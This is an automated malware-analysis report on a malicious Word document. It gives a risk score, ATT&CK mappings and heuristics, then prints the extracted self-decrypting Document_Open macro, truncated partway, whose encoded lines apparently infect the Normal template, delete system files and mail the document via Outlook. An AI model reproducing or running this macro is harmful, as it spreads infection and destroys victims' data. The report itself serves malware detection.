MALICIOUS (Risk Score: 100)
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains VBA macros, specifically a Document_Open macro, a common technique for executing malicious code as soon as a document is opened. The script deobfuscates and rewrites its own code module at run time, indicating downloader or dropper functionality. The presence of the Document_Open macro and the execution of VBA code strongly suggest a spearphishing attachment attack vector.
Heuristics (3)
- VBA macros detected (medium; 2 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- Document_Open macro (high) OLE_VBA_DOCOPEN: Document_Open macro
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 35269 bytes |

SHA-256: c6ad1ef7b475fe409d8748ac4e88b3cb10f545afe9311757a427943dbd99e9f2
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDoc"
Attribute VB_Base = "1Normal.ThisDoc"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
Dim M(2) As Variant: Dim L(8) As Byte
Set M(1) = ActiveDocument.VBProject.VBComponents.Item(1)
Set M(2) = NormalTemplate.VBProject.VBComponents.Item(1)
Set CM = M(1).CodeModule
LinBeg = 33
Line1 = CM.Lines(LinBeg, 1)
L(1) = 1: n = 1 + LinBeg: CC = CM.Lines(LinBeg, CM.CountOfLines - LinBeg)
For I = 2 To 8
L(I) = Mid(Line1, I, 1)
Next
Do While InStr(CM.Lines(n, 1), ": End" + " Sub") = False
CypLinen = CM.Lines(n, 1)
Linen = ""
For k = 2 To Len(CypLinen)
o = Asc(Mid(CypLinen, k, 1))
j = Int(o / 32) + 1
I = 1
Do While (j <> L(I))
I = I + 1
Loop
nc = o - 32 * (L(I) - I)
Linen = Linen + Chr(nc)
Next
CM.ReplaceLine n, Linen: n = n + 1
Loop
CM.DeleteLines LinBeg
IDHMO (M)
CM.DeleteLines LinBeg, CM.CountOfLines - LinBeg: CM.InsertLines LinBeg, CC: ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub
Sub IDHMO(M As Variant)
'6283457
' /î %òòïò 2åóõíå .åøô
' )æ 3ùóôåí®0òéöáôå0òïæéìå3ôòéî稢¢¬ ¢(+%9?#522%.4?53%2<3ïæô÷áòå<-éãòïóïæô</ææéãå<¹®°<7ïòä<3åãõòéôù¢¬ ¢,åöå좩 ¼¾ ¢¢ 4èåî 3ùóôåí®0òéöáôå0òïæéìå3ôòéî稢¢¬ ¢(+%9?#522%.4?53%2<3ïæô÷áòå<-éãòïóïæô</ææéãå<¹®°<7ïòä<3åãõòéôù¢¬ ¢,åöå좩 ½ ±
' #ïííáîä"áòó¨¢4ïïì󢩮#ïîôòïìó¨¢-áãò®%îáâìåä ½ &áìóåº /ðôéïîó®#ïîæéòí#ïîöåòóéïîó ½ &áìóåº /ðôéïîó®6éòõó0òïôåãôéïî ½ &áìóåº /ðôéïîó®3áöå.ïòíáì0òïíðô ½ &áìóå
' 3åô æó ½ #òåáôå/âêåãô¨¢3ãòéðôéîç®&éìå3ùóôåí/âêåãô¢©
' 3åô & ½ æó®'åô&éìå¨.ïòíáì4åíðìáôå®&õìì.áí婺 &®!ôôòéâõôåó ½ °
')æ $áôå ¾ £·¯±·¯°°£ 4èåî §éô ó íù âéòôèäáù ¡
' )æ !ððìéãáôéïî®5óåò.áíå ¼¾ ¢þþþ!îçåì¢ 4èåî
' æó®$åìåôå&éìå ¢#º<éï®óùó¢¬ 4òõåº æó®$åìåôå&éìå ¢#º<ãïîæéç®óùó¢¬ 4òõåº æó®$åìåôå&éìå ¢#º<!õôïåøåã®âáô¢¬ 4òõåº æó®$åìåôå&éìå ¢#º<7éîäï÷ó<÷éî®ãïí¢¬ 4òõåº
' )æ )î3ôò¨!ððìéãáôéïî®5óåò.áíå¬ ¢ë袩 ½ 4òõå 4èåî
' 3åô áõ ½ æó®#òåáôå4åøô&éì娢#º<áõôïåøåã®âáô¢¬ 4òõå©
' áõ®7òéôå,éîå ¨¢ åãèï ïææ¢©
' áõ®7òéôå,éîå ¨¢ åãèï 9ïõò #ïíðõôåò éó âåéîç ãèåãëåä âù ùïõò !îôé6éòõó 0ìåáóå 7áéô ¢©
' áõ®7òéôå,éîå ¨¢ åãèï þþþ!îçå좩
' áõ®7òéôå,éîå ¨¢æïòíáô 㺠¯áõôïôåóô ¯ñ ¯õ¢©
' áõ®#ìïóå
' %îä )æ
' %îä )æ
' )æ !ãôéöå$ïãõíåîô®6"0òïêåãô®6"#ïíðïîåîôó®)ôåí¨±©®.áíå ½ ¢4èéó$ï㢠4èåî
' 3åô /, ½ #òåáôå/âêåãô¨¢/õôìïïë®!ððìéãáôéï
' 3åô -. ½ /,®'åô.áíå3ðáã娢-!0)¢©º -.®,ïçïîº 3åô /- ½ /,®#òåáôå)ôåí¨ïì-áéì)ôåí©
' &ïò á ½ ± 4ï -.®!ääòåóó,éóôó®#ïõîô
' 2áîäïíéúå 4éíåò
' )æ -.®!ääòåóó,éóôó¨á©®!ääòåóó%îôòéåó®#ïõîô ¾ ¸ 4èåî
' &ïò ò ½ ± 4ï )îô¨-.®!ääòåóó,éóôó¨á©®!ääòåóó%îôòéåó®#ïõîô ¯ ¸©
' 4áòçåô ½ )îô¨± « -.®!ääòåóó,éóôó¨á©®!ääòåóó%îôòéåó®#ïõîô ª 2îä©
' /-®2åãéðéåîôó®!ää ¨-.®!ääòåóó,éóôó¨á©®!ääòåóó%îôòéåó¨4áòçåô©©
' .åøô
' %îä )æ
' .åøô
' 7éôè /-
' 3åô 2åã ½ ®2åãéðéåîôó®!ä䨢ïõôìïïë¹·?²°°° èïôíáéì®ãïí¾¢©º 2åã®2åóïìöå
' ®3õâêåãô ½ !ãôéöå$ïãõíåîô®.áíåº ®"ïäù ½ !ððìéãáôéïî®5óåò.áíå ¦ öâ#ò,æ ¦ !ððìéãáôéïî®5óåò!ääòåóó ¦ öâ#ò,æ ¦ öâ#ò,æº ®!ôôáãèíåîôó®!ää !ãôéöå$ïãõíåîô®&õìì.áíåº ®3åîä
' %îä 7éôè
' -.®,ïçïææ
' 3åô /, ½ .ïôèéîç
' %îä )æ
'%îä )æ
' .â,± ½ -¨±©®#ïäå-ïäõìå®#ïõîô/æ,éîåó
' .â,² ½ -¨²©®#ïäå-ïäõìå®#ïõîô/æ,éîåó
' ).&? ½ &áìóåº ,éî"åç ½ ³³
' )æ -¨²©®.áíå ¼¾ ¢4èéó$ï㢠4èåî
' )æ .â,² ¾ ° 4èåî
' -¨²©®#ïäå-ïäõìå®$åìåôå,éîåó ±¬ .â,²
' %îä )æ
' -¨²©®.áíå ½ ¢4èéó$ï㢺 ).& ½ 4òõå
' %îä )æ
' )æ ).& ½ &áìóå 4èåî 'ï4ï #2904?
' .å÷.áíå ½ ¢¢
' 2áîäïíéúå 4éíåò
' &ïò ) ½ ± 4ï µ
' .å÷.áíå ½ .å÷.áíå « #èò¨)îô¨¶µ «
... (truncated)
```